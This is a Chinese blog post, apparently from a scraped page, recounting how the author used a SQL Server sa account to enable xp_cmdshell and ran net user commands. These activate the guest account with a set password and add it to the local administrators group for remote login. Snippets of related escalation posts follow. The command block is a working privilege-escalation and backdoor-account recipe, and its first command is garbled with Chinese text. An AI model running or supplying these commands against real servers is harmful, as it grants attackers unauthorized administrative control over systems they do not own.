遇到小人,把伺服器整走了
自己手裡只有sql server的sa賬號密碼
模糊記起之前用這個賬戶提權讀取檔案的事
各種工具也用了不少 發現不是語法錯誤就是許可權不夠
無奈之下裝了sql server r2直接來操作
順利連線上去,看到有master這個庫。
直奔重點去
這裡要用到的就是xp_cmdshell這個儲存過程,算是mssql有sa許可權下的提權利器,不過有經驗的管理員一般都會用各種牛逼的方法去禁止普通使用者使用它
嘗試用正常的方法開啟xp_cmdshell:
看來運氣還是不錯滴,xp_cmdshell順利開啟了。然後就可以直接執行cmd命令了:
exec xp_cmdshell '算是順利net user guest qwer123456789
'exec xp_cmdshell '
net user guest /active:yes
'exec xp_cmdshell '
net localgroup administrators guest /add
'
沒什麼障礙
最後附上一張遠端登入的截圖
記一次艱難的提權
記一次艱難的提權 資料報經過路由器就被拋棄了.初步判斷是路由器設定了acl表。掃瞄了一下目標伺服器,只開了80埠,伺服器作業系統是windows 2003.埠復用在2003上不管用。看來只有把iis停了再把45678埠轉到80埠上了。在c windows 目錄中寫了個1.bat 內容是copy c ...
一次 vulnhub靶機提權
kali linux vmware 橋接模式,複製網絡卡狀態 windows 物理機 檢視原始碼,得到 訪問 rambo.html kali 直接使用 掃出乙個目錄 johnnyrambo 這邊因為靶機是公用的,然後被人rm rf 了,所以我自己重新搭建了乙個 ip 位址改成 192.168.232...
ms sql 一次插入多條記錄的語句
有的時候我們需要一次像資料庫中新增多條記錄,我們可以使用下面的語句來實現 新增一條記錄 insert into tablename col1,col2,col3 values 1,2,3 新增多條記錄 insert into tablename col1,col2,col3 select 3,4,5...